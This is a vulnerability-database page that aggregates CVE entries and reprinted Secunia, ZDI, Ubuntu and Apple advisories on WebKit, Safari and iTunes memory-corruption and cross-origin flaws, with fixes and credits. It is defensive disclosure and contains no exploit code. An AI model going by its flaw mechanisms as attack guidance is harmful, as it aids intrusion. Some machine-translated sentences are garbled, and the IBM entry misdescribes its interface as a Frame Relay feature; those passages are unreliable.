VARIoT IoT vulnerabilities database

CRLF injection vulnerability in load.php in the Local Management Interface (LMI) on the IBM Proventia Network Mail Security System (PNMSS) appliance with firmware before 2.5 allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the javaVersion parameter. The Local Management Interface is a set of enhancements to the basic Frame Relay specification

Use-after-free vulnerability in WebKit, as used in Apple iTunes before 10.2 on Windows, Apple Safari, and Google Chrome before 6.0.472.59, allows remote attackers to execute arbitrary code or cause a denial of service via vectors related to SVG styles, the DOM tree, and error messages. Google Chrome Used in Webkit Is SVG style Service operation is interrupted due to incomplete processing (DoS) There are vulnerabilities that can be in a state or are otherwise unaffected.Service disruption by a third party (DoS) You may be put into a state or affected by other details. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the methodology the application takes to inform a user about an error while parsing a malformed document. When displaying the error message, the application will append the message to the current instance of the DOM tree causing another element to be removed which will lead to the styles being recalculated. When the styles are recalculated the application will access the initially freed element which can lead to code execution under the context of the application. WebKit is prone to multiple memory-corruption vulnerabilities. An attacker may exploit these issues by enticing victims into viewing a malicious webpage. This BID is being retired. The following individual records exists to better document the issues: 46684 WebKit CVE-2011-0111 Unspecified Memory Corruption Vulnerability 46686 WebKit CVE-2011-0117 Unspecified Memory Corruption Vulnerability 46687 WebKit CVE-2011-0118 Unspecified Memory Corruption Vulnerability 46688 WebKit CVE-2011-0119 Unspecified Memory Corruption Vulnerability 46689 WebKit CVE-2011-0141 Unspecified Memory Corruption Vulnerability 46690 WebKit CVE-2011-0136 Unspecified Memory Corruption Vulnerability 46691 WebKit CVE-2011-0114 Unspecified Memory Corruption Vulnerability 46692 WebKit CVE-2011-0128 Unspecified Memory Corruption Vulnerability 46693 WebKit CVE-2011-0129 Unspecified Memory Corruption Vulnerability 46694 WebKit CVE-2011-0120 Unspecified Memory Corruption Vulnerability 46695 WebKit CVE-2011-0143 Unspecified Memory Corruption Vulnerability 46696 WebKit CVE-2011-0121 Unspecified Memory Corruption Vulnerability 46698 WebKit CVE-2011-0123 Unspecified Memory Corruption Vulnerability 46699 WebKit CVE-2011-0144 Unspecified Memory Corruption Vulnerability 46700 WebKit CVE-2011-0130 Unspecified Memory Corruption Vulnerability 46701 WebKit CVE-2011-0125 Unspecified Memory Corruption Vulnerability 46702 WebKit CVE-2011-0147 Unspecified Memory Corruption Vulnerability 46703 WebKit CVE-2011-0164 Unspecified Memory Corruption Vulnerability 46704 WebKit CVE-2011-0131 Unspecified Memory Corruption Vulnerability 46705 WebKit CVE-2011-0127 Unspecified Memory Corruption Vulnerability 46706 WebKit CVE-2011-0142 Unspecified Memory Corruption Vulnerability 46707 WebKit CVE-2011-0137 Unspecified Memory Corruption Vulnerability 46708 WebKit CVE-2011-0148 Unspecified Memory Corruption Vulnerability 46709 WebKit CVE-2011-0135 Unspecified Memory Corruption Vulnerability 46710 WebKit CVE-2011-0145 Unspecified Memory Corruption Vulnerability 46711 WebKit CVE-2011-0134 Unspecified Memory Corruption Vulnerability 46712 WebKit CVE-2011-0139 Unspecified Memory Corruption Vulnerability 46713 WebKit CVE-2011-0138 Unspecified Memory Corruption Vulnerability 46714 WebKit CVE-2011-0140 Unspecified Memory Corruption Vulnerability 46715 WebKit CVE-2011-0146 Unspecified Memory Corruption Vulnerability 46716 WebKit CVE-2011-0165 Unspecified Memory Corruption Vulnerability 46717 WebKit CVE-2011-0150 Unspecified Memory Corruption Vulnerability 46718 WebKit CVE-2011-0152 Unspecified Memory Corruption Vulnerability 46719 WebKit CVE-2011-0151 Unspecified Memory Corruption Vulnerability 46720 WebKit CVE-2011-0153 Unspecified Memory Corruption Vulnerability 46721 WebKit CVE-2011-0155 Unspecified Memory Corruption Vulnerability 46722 WebKit CVE-2011-0168 Unspecified Memory Corruption Vulnerability 46723 WebKit CVE-2011-0122 Unspecified Memory Corruption Vulnerability 46724 WebKit CVE-2011-0156 Unspecified Memory Corruption Vulnerability 46725 WebKit CVE-2011-0124 Unspecified Memory Corruption Vulnerability 46726 WebKit CVE-2011-0112 Unspecified Memory Corruption Vulnerability 46727 WebKit CVE-2011-0126 Unspecified Memory Corruption Vulnerability 46728 WebKit CVE-2011-0113 Unspecified Memory Corruption Vulnerability 46744 WebKit CVE-2011-0149 'HTMLBRElement' Style Memory Corruption Vulnerability 46745 WebKit CVE-2011-0154 Javascript 'sort()' Method Memory Corruption Vulnerability 46746 WebKit Range Object Remote Code Execution Vulnerability 46747 WebKit CVE-2011-0116 'setOuterText()' Method Memory Corruption Remote Code Execution Vulnerability 46748 WebKit 'Runin' Box CVE-2011-0132 Use-After-Free Memory Corruption Vulnerability 46749 WebKit CVE-2011-0133 Glyph Data Memory Corruption Vulnerability. NOTE: This issue was previously discussed in BID 43228 (Google Chrome prior to 6.0.472.59 Multiple Security Vulnerabilities) but has been given its own record to better document it. WebKit is a set of open source web browser engines jointly developed by companies such as KDE, Apple (Apple), and Google (Google), and is currently used by browsers such as Apple Safari and Google Chrome. ---------------------------------------------------------------------- Get a tax break on purchases of Secunia Solutions! If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/ ---------------------------------------------------------------------- TITLE: Apple iTunes Multiple Vulnerabilities SECUNIA ADVISORY ID: SA43582 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43582/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43582 RELEASE DATE: 2011-03-03 DISCUSS ADVISORY: http://secunia.com/advisories/43582/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43582/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43582 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Apple iTunes, which can be exploited by malicious people to compromise a user's system. 1) Some errors exists due to the use of a vulnerable libpng library. For more information: SA40302 2) An array indexing error in the CoreGraphics library (ImageIO) when processing the International Color Consortium (ICC) profile within a JPEG image can be exploited to corrupt heap-based memory. 3) An error in the libTIFF library when handling JPEG encoded TIFF images can be exploited to cause a buffer overflow. 4) A boundary error in the libTIFF library when handling CCITT Group 4 encoded TIFF images. For more information: SA43593 5) A double free error in the libxml library when handling XPath expressions. For more information: SA42721 6) An error exists in the libxml library when traversing the XPath. 9) An error in the WebKit component when handling a DOM level 2 range object can be exploited to corrupt memory by manipulating the DOM via an event listener. 10) A use-after-free error in the "setOuterText()" method in the htmlelement library (WebKit) when tracking DOM manipulations can be exploited to dereference freed memory. 11) A use-after-free error in the WebKit component when promoting a run-in element can be exploited to dereference freed memory. 12) An error in the WebKit component when performing layout operations for a floating block of a pseudo-element can be exploited to dereference uninitialised glyph data. 13) An error in the WebKit component when parsing a Root HTMLBRElement element can be exploited to call an unmapped dangling pointer. 14) An error in the Javascript array "sort()" method (WebKit) can be exploited to manipulate elements outside of the array's boundary. SOLUTION: Update to version 10.2. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: 2) Andrzej Dyjak via iDefense VCP 3, 4) Reported by the vendor 8, 11 - 13) wushi of team509 via ZDI 9) J23 via ZDI 10, 14) An anonymous person via ZDI 11) Jose A. Vazquez via ZDI The vendor also credits: 5) Yang Dingning of NCNIPC, Graduate University of Chinese Academy of Sciences 6) Bui Quang Minh, Bkis 8) kuzcc 9) Emil A Eklund, Google Inc 13) SkyLined, Google Chrome Security Team The vendor provides a bundled list of credits for vulnerabilities in #7: Sergey Glazunov Andreas Kling, Nokia Yuzo Fujishima, Google Inc. Abhishek Arya (Inferno), Google, Inc. Mihai Parparita, Google, Inc. Emil A Eklund, Google, Inc. Michal Zalewski, Google, Inc. Chris Evans, Google Chrome Security Team SkyLined, Google Chrome Security Team Chris Rohlf, Matasano Security Aki Helin, OUSPG Dirk Schulze Slawomir Blazek David Bloom Famlam Jan Tosovsky Michael Gundlach ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT4554 iDefense VCP: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=897 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-095/ http://www.zerodayinitiative.com/advisories/ZDI-11-096/ http://www.zerodayinitiative.com/advisories/ZDI-11-097/ http://www.zerodayinitiative.com/advisories/ZDI-11-098/ http://www.zerodayinitiative.com/advisories/ZDI-11-099/ http://www.zerodayinitiative.com/advisories/ZDI-11-100/ http://www.zerodayinitiative.com/advisories/ZDI-11-101/ OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). For more information: SA32349 SA33495 SA35095 SA35379 SA35411 SA35449 SA35758 SA36269 SA36677 SA37273 SA37346 SA37769 SA38061 SA38545 SA38932 SA39029 SA39091 SA39384 SA39661 SA39937 SA40002 SA40072 SA40105 SA40112 SA40148 SA40196 SA40257 SA40664 SA40783 SA41014 SA41085 SA41242 SA41328 SA41390 SA41443 SA41535 SA41841 SA41888 SA41968 SA42151 SA42264 SA42290 SA42312 SA42443 SA42461 SA42658 SA42769 SA42886 SA42956 SA43053 SOLUTION: Apply updated packages via YaST Online Update or the SUSE FTP server. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4554 -- Disclosure Timeline: 2010-10-18 - Vulnerability reported to vendor 2011-03-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * wushi of team509 -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . ========================================================================== Ubuntu Security Notice USN-1195-1 August 23, 2011 webkit vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: Multiple security vulnerabilities were fixed in WebKit. Software Description: - webkit: Web content engine library for GTK+ Details: A large number of security issues were discovered in the WebKit browser and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 10.10: libwebkit-1.0-2 1.2.7-0ubuntu0.10.10.1 Ubuntu 10.04 LTS: libwebkit-1.0-2 1.2.7-0ubuntu0.10.04.1 After a standard system update you need to restart any applications that use WebKit, such as Epiphany and Midori, to make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1195-1 CVE-2010-1824, CVE-2010-2646, CVE-2010-2651, CVE-2010-2900, CVE-2010-2901, CVE-2010-3120, CVE-2010-3254, CVE-2010-3812, CVE-2010-3813, CVE-2010-4040, CVE-2010-4042, CVE-2010-4197, CVE-2010-4198, CVE-2010-4199, CVE-2010-4204, CVE-2010-4206, CVE-2010-4492, CVE-2010-4493, CVE-2010-4577, CVE-2010-4578, CVE-2011-0482, CVE-2011-0778 Package Information: https://launchpad.net/ubuntu/+source/webkit/1.2.7-0ubuntu0.10.10.1 https://launchpad.net/ubuntu/+source/webkit/1.2.7-0ubuntu0.10.04.1

Use-after-free vulnerability in WebKit before r65958, as used in Google Chrome before 6.0.472.59, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger use of document APIs such as document.close during parsing, as demonstrated by a Cascading Style Sheets (CSS) file referencing an invalid SVG font, aka rdar problem 8442098. Google Chrome Used in Webkit There is a service disruption (DoS) There are vulnerabilities that can be in a state or are otherwise unaffected.Service disruption by a third party (DoS) You may be put into a state or affected by other details. Google Chrome is prone to multiple vulnerabilities. Attackers can exploit these issues to execute arbitrary code in the context of the browser or cause denial-of-service conditions; other attacks are also possible. Versions prior to Chrome 6.0.472.59 are vulnerable. WebKit is a set of open source web browser engines jointly developed by companies such as KDE, Apple (Apple), and Google (Google), and is currently used by browsers such as Apple Safari and Google Chrome. The vulnerability has been demonstrated in Cascading Style Sheet (CSS) files that reference invalid SVG fonts. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2011-07-20-1 Safari 5.1 and Safari 5.0.6 Safari 5.1 and Safari 5.0.6 are now available and address the following: CFNetwork Available for: Windows 7, Vista, XP SP2 or later Impact: Visiting a maliciously crafted website may lead to a cross- site scripting attack Description: In certain situations, Safari may treat a file as HTML, even if it is served with the 'text/plain' content type. This may lead to a cross-site scripting attack on sites that allow untrusted users to post text files. This issue is addressed through improved handling of 'text/plain' content. CVE-ID CVE-2010-1420 : Hidetake Jo working with Microsoft Vulnerability Research (MSVR), Neal Poole of Matasano Security CFNetwork Available for: Windows 7, Vista, XP SP2 or later Impact: Authenticating to a maliciously crafted website may lead to arbitrary code execution Description: The NTLM authentication protocol is susceptible to a replay attack referred to as credential reflection. Authenticating to a maliciously crafted website may lead to arbitrary code execution. To mitigate this issue, Safari has been updated to utilize protection mechanisms recently added to Windows. This issue does not affect Mac OS X systems. CVE-ID CVE-2010-1383 : Takehiro Takahashi of IBM X-Force Research CFNetwork Available for: Windows 7, Vista, XP SP2 or later Impact: A root certificate that is disabled may still be trusted Description: CFNetwork did not properly validate that a certificate was trusted for use by a SSL server. As a result, if the user had marked a system root certificate as not trusted, Safari would still accept certificates signed by that root. This issue is addressed through improved certificate validation. This issue does not affect Mac OS X systems. CVE-ID CVE-2011-0214 : An anonymous reporter ColorSync Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted image with an embedded ColorSync profile may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the handling of images with an embedded ColorSync profile, which may lead to a heap buffer overflow. Opening a maliciously crafted image with an embedded ColorSync profile may lead to an unexpected application termination or arbitrary code execution. For Mac OS X v10.5 systems, this issue is addressed in Security Update 2011-004. CVE-ID CVE-2011-0200 : binaryproof working with TippingPoint's Zero Day Initiative CoreFoundation Available for: Windows 7, Vista, XP SP2 or later Impact: Applications that use the CoreFoundation framework may be vulnerable to an unexpected application termination or arbitrary code execution Description: An off-by-one buffer overflow issue existed in the handling of CFStrings. Applications that use the CoreFoundation framework may be vulnerable to an unexpected application termination or arbitrary code execution. For Mac OS X v10.6 systems, this issue is addressed in Mac OS X v10.6.8. CVE-ID CVE-2011-0201 : Harry Sintonen CoreGraphics Available for: Windows 7, Vista, XP SP2 or later Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow issue existed in the handling of Type 1 fonts. Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution. For Mac OS X v10.6 systems, this issue is addressed in Mac OS X v10.6.8. For Mac OS X v10.5 systems, this issue is addressed in Security Update 2011-004. CVE-ID CVE-2011-0202 : Cristian Draghici of Modulo Consulting, Felix Grobert of the Google Security Team International Components for Unicode Available for: Windows 7, Vista, XP SP2 or later Impact: Applications that use ICU may be vulnerable to an unexpected application termination or arbitrary code execution Description: A buffer overflow issue existed in ICU's handling of uppercase strings. Applications that use ICU may be vulnerable to an unexpected application termination or arbitrary code execution. For Mac OS X v10.6 systems, this issue is addressed in Mac OS X v10.6.8. CVE-ID CVE-2011-0206 : David Bienvenu of Mozilla ImageIO Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution Description: A heap buffer overflow existed in ImageIO's handling of TIFF images. Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution. For Mac OS X v10.6 systems, this issue is addressed in Mac OS X v10.6.8. For Mac OS X v10.5 systems, this issue is addressed in Security Update 2011-004. CVE-ID CVE-2011-0204 : Dominic Chell of NGS Secure ImageIO Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution Description: A heap buffer overflow existed in ImageIO's handling of CCITT Group 4 encoded TIFF images. Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution. CVE-ID CVE-2011-0241 : Cyril CATTIAUX of Tessi Technologies ImageIO Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution Description: A reentrancy issue existed in ImageIO's handling of TIFF images. Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution. This issue does not affect Mac OS X systems. CVE-ID CVE-2011-0215 : Juan Pablo Lopez Yacubian working with iDefense VCP ImageIO Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution Description: A heap buffer overflow existed in ImageIO's handling of TIFF images. Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution. For Mac OS X v10.6 systems, this issue is addressed in Mac OS X v10.6.8. For Mac OS X v10.5 systems, this issue is addressed in Security Update 2011-004. CVE-ID CVE-2011-0204 : Dominic Chell of NGS Secure libxslt Available for: Windows 7, Vista, XP SP2 or later Impact: Visiting a maliciously crafted website may lead to the disclosure of addresses on the heap Description: libxslt's implementation of the generate-id() XPath function disclosed the address of a heap buffer. Visiting a maliciously crafted website may lead to the disclosure of addresses on the heap. This issue is addressed by generating an ID based on the difference between the addresses of two heap buffers. For Mac OS X v10.6 systems, this issue is addressed in Mac OS X v10.6.8. For Mac OS X v10.5 systems, this issue is addressed in Security Update 2011-004. CVE-ID CVE-2011-0195 : Chris Evans of the Google Chrome Security Team libxml Available for: Windows 7, Vista, XP SP2 or later Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution Description: A one-byte heap buffer overflow existed in libxml's handling of XML data. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. CVE-ID CVE-2011-0216 : Billy Rios of the Google Security Team Safari Available for: Mac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later, Windows 7, Vista, XP SP2 or later Impact: If the "AutoFill web forms" feature is enabled, visiting a maliciously crafted website and typing may lead to the disclosure of information from the user's Address Book Description: Safari's "AutoFill web forms" feature filled in non- visible form fields, and the information was accessible by scripts on the site before the user submitted the form. This issue is addressed by displaying all fields that will be filled, and requiring the user's consent before AutoFill information is available to the form. CVE-ID CVE-2011-0217 : Florian Rienhardt of BSI, Alex Lambert, [Jeremiah Grossman] Safari Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later, Windows 7, Vista, XP SP2 or later Impact: With a certain Java configuration, visiting a malicious website may lead to unexpected text being displayed on other sites Description: A cross origin issue existed in the handling of Java Applets. This applies when Java is enabled in Safari, and Java is configured to run within the browser process. Fonts loaded by a Java applet could affect the display of text content from other sites. This issue is addressed by running Java applets in a separate process. CVE-ID CVE-2011-0219 : Joshua Smith of Kaon Interactive WebKit Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later, Windows 7, Vista, XP SP2 or later Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in WebKit. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. CVE-ID CVE-2010-1823 : David Weston of Microsoft and Microsoft Vulnerability Research (MSVR), wushi of team509, and Yong Li of Research In Motion Ltd CVE-2011-0164 : Apple CVE-2011-0218 : SkyLined of Google Chrome Security Team CVE-2011-0221 : Abhishek Arya (Inferno) of Google Chrome Security Team CVE-2011-0222 : Nikita Tarakanov and Alex Bazhanyuk of the CISS Research Team, and Abhishek Arya (Inferno) of Google Chrome Security Team CVE-2011-0223 : Jose A. Vazquez of spa-s3c.blogspot.com working with iDefense VCP CVE-2011-0225 : Abhishek Arya (Inferno) of Google Chrome Security Team CVE-2011-0232 : J23 working with TippingPoint's Zero Day Initiative CVE-2011-0233 : wushi of team509 working with TippingPoint's Zero Day Initiative CVE-2011-0234 : Rob King working with TippingPoint's Zero Day Initiative, wushi of team509 working with TippingPoint's Zero Day Initiative, wushi of team509 working with iDefense VCP CVE-2011-0235 : Abhishek Arya (Inferno) of Google Chrome Security Team CVE-2011-0237 : wushi of team509 working with iDefense VCP CVE-2011-0238 : Adam Barth of Google Chrome Security Team CVE-2011-0240 : wushi of team509 working with iDefense VCP CVE-2011-0253 : Richard Keen CVE-2011-0254 : An anonymous researcher working with TippingPoint's Zero Day Initiative CVE-2011-0255 : An anonymous researcher working with TippingPoint's Zero Day Initiative CVE-2011-0981 : Rik Cabanier of Adobe Systems, Inc CVE-2011-0983 : Martin Barbella CVE-2011-1109 : Sergey Glazunov CVE-2011-1114 : Martin Barbella CVE-2011-1115 : Martin Barbella CVE-2011-1117 : wushi of team509 CVE-2011-1121 : miaubiz CVE-2011-1188 : Martin Barbella CVE-2011-1203 : Sergey Glazunov CVE-2011-1204 : Sergey Glazunov CVE-2011-1288 : Andreas Kling of Nokia CVE-2011-1293 : Sergey Glazunov CVE-2011-1296 : Sergey Glazunov CVE-2011-1449 : Marek Majkowski, wushi of team 509 working with iDefense VCP CVE-2011-1451 : Sergey Glazunov CVE-2011-1453 : wushi of team509 working with TippingPoint's Zero Day Initiative CVE-2011-1457 : John Knottenbelt of Google CVE-2011-1462 : wushi of team509 CVE-2011-1797 : wushi of team509 WebKit Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later, Windows 7, Vista, XP SP2 or later Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A configuration issue existed in WebKit's use of libxslt. Visiting a maliciously crafted website may lead to arbitrary files being created with the privileges of the user, which may lead to arbitrary code execution. This issue is addressed through improved libxslt security settings. CVE-ID CVE-2011-1774 : Nicolas Gregoire of Agarri WebKit Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later, Windows 7, Vista, XP SP2 or later Impact: Visiting a maliciously crafted website may lead to an information disclosure Description: A cross-origin issue existed in the handling of Web Workers. Visiting a maliciously crafted website may lead to an information disclosure. CVE-ID CVE-2011-1190 : Daniel Divricean of divricean.ro WebKit Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later, Windows 7, Vista, XP SP2 or later Impact: Visiting a maliciously crafted website may lead to a cross- site scripting attack Description: A cross-origin issue existed in the handling of URLs with an embedded username. Visiting a maliciously crafted website may lead to a cross-site scripting attack. This issue is addressed through improved handling of URLs with an embedded username. CVE-ID CVE-2011-0242 : Jobert Abma of Online24 WebKit Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later, Windows 7, Vista, XP SP2 or later Impact: Visiting a maliciously crafted website may lead to a cross- site scripting attack Description: A cross-origin issue existed in the handling of DOM nodes. Visiting a maliciously crafted website may lead to a cross- site scripting attack. CVE-ID CVE-2011-1295 : Sergey Glazunov WebKit Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later, Windows 7, Vista, XP SP2 or later Impact: A maliciously crafted website may be able to cause a different URL to be shown in the address bar Description: A URL spoofing issue existed in the handling of the DOM history object. A maliciously crafted website may have been able to cause a different URL to be shown in the address bar. CVE-ID CVE-2011-1107 : Jordi Chancel WebKit Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later, Windows 7, Vista, XP SP2 or later Impact: Subscribing to a maliciously crafted RSS feed and clicking on a link within it may lead to an information disclosure Description: A canonicalization issue existed in the handling of URLs. Subscribing to a maliciously crafted RSS feed and clicking on a link within it may lead to arbitrary files being sent from the user's system to a remote server. This update addresses the issue through improved handling of URLs. CVE-ID CVE-2011-0244 : Jason Hullinger WebKit Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later, Windows 7, Vista, XP SP2 or later Impact: Applications that use WebKit, such as mail clients, may connect to an arbitrary DNS server upon processing HTML content Description: DNS prefetching was enabled by default in WebKit. Applications that use WebKit, such a s mail clients, may connect to an arbitrary DNS server upon processing HTML content. This update addresses the issue by requiring applications to opt in to DNS prefetching. CVE-ID CVE-2010-3829 : Mike Cardwell of Cardwell IT Ltd. Note: Safari 5.1 is included with OS X Lion. Safari 5.1 and Safari 5.0.6 address the same set of security issues. Safari 5.1 is provided for Mac OS X v10.6, and Windows systems. Safari 5.0.6 is provided for Mac OS X v10.5 systems. Safari 5.1 is available via the Apple Software Update application, or Apple's Safari download site at: http://www.apple.com/safari/download/ Safari 5.0.6 is available via the Apple Software Update application, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ Safari for Mac OS X v10.6.8 and later The download file is named: Safari5.1SnowLeopard.dmg Its SHA-1 digest is: 2c3cef8e06c5aa586379b1a5fd5cf7b54e8acc24 Safari for Mac OS X v10.5.8 The download file is named: Safari5.0.6Leopard.dmg Its SHA-1 digest is: ea970375d2116a7b74094a2a7669bebc306b6e6f Safari for Windows 7, Vista or XP The download file is named: SafariSetup.exe Its SHA-1 digest is: d00b791c694b1ecfc22d6a1ec9aa21cc14fd8e36 Safari for Windows 7, Vista or XP from the Microsoft Choice Screen The download file is named: Safari_Setup.exe Its SHA-1 digest is: ccb3bb6b06468a430171d9f62708a1a6d917f45b Safari+QuickTime for Windows 7, Vista or XP The file is named: SafariQuickTimeSetup.exe Its SHA-1 digest is: 1273e0ee742a294d65e4f25a9b3e36f79fb517c9 Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.9 (Darwin) iQEcBAEBAgAGBQJOJI45AAoJEGnF2JsdZQeezHQIALKZms5tzYgYxUSdxmo+DmYw up9gAmEVcltZvCeVS1lUxfjqnRiGRSWyuou8Ynt9PfGQCz9GfLvzlrCHc5rsnKaD MeYY1IH7lQc6aqmV0hwb4nUL5qJntP6G5Ai0E/0UiRQNC/ummS+qnmdsiFo78ODY nKaB5cAWhqGHgOAPnUG0JwmxpYgR2HEtGYJSqlYykMwt1vnlAr5hHVNaUJcJ3Hlb vesN6fB7zQMiJVo8+iJBixCvIYlbII5HnVAmD1ToyKgENg4Iguo46YBMVr8DPgF/ KD2s0+VF/O4utYVX0GiRGReVyq1PMvz/HI23ym8U3LjbezXD/AALQET0Q2hUEYQ= =fOfF -----END PGP SIGNATURE----- . Description: Multiple memory corruption issues existed in WebKit. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: SUSE update for Multiple Packages SECUNIA ADVISORY ID: SA43068 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43068/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43068 RELEASE DATE: 2011-01-25 DISCUSS ADVISORY: http://secunia.com/advisories/43068/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43068/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43068 ONLY AVAILABLE WITH SECUNIA CSI 